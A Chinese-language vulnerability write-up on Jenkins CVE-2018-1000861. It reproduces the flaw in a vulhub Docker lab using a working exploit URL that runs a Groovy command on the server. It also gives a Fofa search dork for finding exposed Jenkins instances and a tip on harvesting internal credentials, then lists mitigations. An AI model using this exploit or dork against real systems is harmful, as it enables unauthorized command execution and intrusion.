Jenkins遠程命令執行漏洞(CVE-2018-1000861)

1. 漏洞簡介

Jenkins 是常見的CI/CD服務器, 最常見的就是爆破弱口令然後使用groovy執行命令

2. 影響組件

Jenkins

3. 漏洞指紋

Jenkins

4. Fofa Dork

app="Jenkins"

5. 漏洞分析

這裏我們是用docker快速搭建

git clone https://github.com/vulhub/vulhub.git

cd /root/vulhub/jenkins/CVE-2018-1000861

docker-compose up -d

 

訪問http://your-ip:8080,即可看到一個已經成功初始化的Jenkins

我們直接在瀏覽器輸入

http://192.168.20.128:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript
?sandbox=true&value=public class x {public x(){"touch /tmp/CVE-2018-1000861_is_success".execute()}}

 

沒有回顯,似乎成功了

進去docker裏面看看

docker-compose exec jenkins bash

發現成功創建了

6. 利用技巧

1.Jenkins 也是收集內網信息的好地方, 獲取的賬號通常也是開發/運維級別的, 權限相對較大

7. 防護方法

1.設置強口令

2.儘量不要開放到公網

3.限制來源IP

4.升級到最新版

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章